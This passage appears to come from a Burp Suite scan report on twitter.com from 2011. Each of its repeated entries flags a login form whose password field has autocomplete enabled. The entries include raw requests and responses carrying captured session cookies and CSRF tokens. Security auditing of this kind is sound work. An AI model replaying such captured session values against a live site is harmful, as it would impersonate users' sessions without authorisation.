Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265994-35762-9331
ETag: "084cf3c9b164746f0254081f5cf026a3"
Last-Modified: Sat, 29 Jan 2011 01:53:14 GMT
X-Runtime: 0.00950
Content-Type: text/html; charset=utf-8
Content-Length: 52317
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="f16c285838955139f7945f387a2f3010bd7f989e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.79. http://twitter.com/Trackgals/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Trackgals/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Trackgals/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-91506-33293
ETag: "1be6fcf55b971925b5829f3dff23d7be"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00823
Content-Type: text/html; charset=utf-8
Content-Length: 52701
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.80. http://twitter.com/_juliannemoore

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /_juliannemoore

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /_juliannemoore HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-32409-42560
ETag: "1befeb7740b62870da7fe07d809fb4d6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.01153
Content-Type: text/html; charset=utf-8
Content-Length: 34492
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="fd3f2dc0a323218ee91e1917b64ee23467a6523e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.81. http://twitter.com/ajpiano

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ajpiano

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /ajpiano HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-9839-24776
ETag: "6cfb51a84c8ef82cfc30accecbfd12df"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01348
Content-Type: text/html; charset=utf-8
Content-Length: 48953
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="c8faff30ccffc14fde92500b28b972fe171e2d68" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.82. http://twitter.com/androidnewsblog

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /androidnewsblog

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /androidnewsblog HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-13968-5956
ETag: "b0e4ae48560abd6de3188c44a0de9618"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01122
Content-Type: text/html; charset=utf-8
Content-Length: 49638
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="dc41f69ce825bc8a200fc0aba8ac41539b7f3aa7" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.83. http://twitter.com/backstreetboys

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /backstreetboys

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /backstreetboys HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265308-18449-44248
ETag: "470b046c74671df35cc91c1d8792ddb5"
Last-Modified: Sat, 29 Jan 2011 01:41:48 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 47038
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="98f3ef61815b92f51afee6818b5fe7ea4431be61" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.84. http://twitter.com/benmezrich

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /benmezrich

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /benmezrich HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-66900-52833
ETag: "c5b0a06ada9d5c4864087cf3c0c522b7"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01562
Content-Type: text/html; charset=utf-8
Content-Length: 50003
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="ef40b1bc16ea0eb70107596630b915ba00500f0f" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.85. http://twitter.com/bennadel

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /bennadel

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225029-56076-61608
ETag: "241ca6186e49f64c12f595a689635dc8"
Last-Modified: Fri, 28 Jan 2011 14:30:29 GMT
X-Runtime: 0.64571
Content-Type: text/html; charset=utf-8
Content-Length: 49758
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="f35ae8a6d0edde621904b83a71f25c62c623f2c1" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.86. http://twitter.com/bostonherald

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /bostonherald

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /bostonherald HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265280-17400-32279
ETag: "e1a9ca3ce3850d33d8312521c7367bdc"
Last-Modified: Sat, 29 Jan 2011 01:41:20 GMT
X-Runtime: 0.00787
Content-Type: text/html; charset=utf-8
Content-Length: 38696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="426bc590abd01dde88961f153052a78b725445d5" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.87. http://twitter.com/cjronson

Summary

Severity: Low
Confidence: Certain
Host: http://twitter.com
Path: /cjronson

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions. The form contains the following password field with autocomplete enabled: session[password].

Request

GET /cjronson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
